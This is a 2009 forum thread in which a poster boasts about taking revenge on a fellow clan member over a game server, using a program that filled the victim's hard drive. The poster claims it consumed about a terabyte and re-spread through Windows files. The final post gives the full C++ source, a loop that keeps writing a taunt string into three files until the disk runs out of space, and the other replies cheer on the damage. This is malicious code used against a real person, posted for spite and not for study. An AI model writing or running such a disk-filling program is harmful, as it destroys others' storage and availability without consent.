Page 1 of 1

Dont mess with TehKiller XD

Posted: Thu Jul 23, 2009 3:42 pm
by TeamRetox
Lol, some retard from our clan decided to fuck up the zombiemod he hosted for us by puttin unl ammo ^^
Jay(clan leader) asked me to do this :)

Image

thats about 10-20 minutes of writing ^^

edit: forgot to tell that this loops untill his harddrive is full. and infected windows crap to do the same if he removes it ^^
(its currently at 13gb ea file)

Re: Dont mess with TehKiller XD

Posted: Thu Jul 23, 2009 5:54 pm
by Sethioz
this thing keeps making files with random data in them ?
haha when HDD is full, then it wont be bootable.

Re: Dont mess with TehKiller XD

Posted: Thu Jul 23, 2009 6:29 pm
by TeamRetox
he found out when the files reached 320 gb ea, so 1 terrabyte of disk space raped ^^

not really random data(was too lazy to write random data) instead it got filled with
FUCK U KEKEKEKEKEKEKEKE - Revenge for fucking Zombiemod up lololol
the code I wrote in a short 2-3 min ^^:

Code: Select all

#include <windows.h>
#include <iostream>
#include <fstream>
using namespace std;

int main()
{
	FILE *LOL = fopen("you.txt", "a");
	FILE *KEK = fopen("suck.txt", "a");
	FILE *FDF = fopen("balls.txt", "a");
	for(int i = 0; i < 1000000; i++)
	{
		for(int j = 0; j < 1000000; j++)
		{
			for(int k = 0; k < 1000000; k++)
			{
				char buffer[67] = "FUCK U KEKEKEKEKEKEKEKE - Revenge for fucking Zombiemod up lololol";
				fwrite(buffer, 1, sizeof(buffer), LOL);
				fwrite(buffer, 1, sizeof(buffer), KEK);
				fwrite(buffer, 1, sizeof(buffer), FDF);
			}
		}
	}
	return 0;
}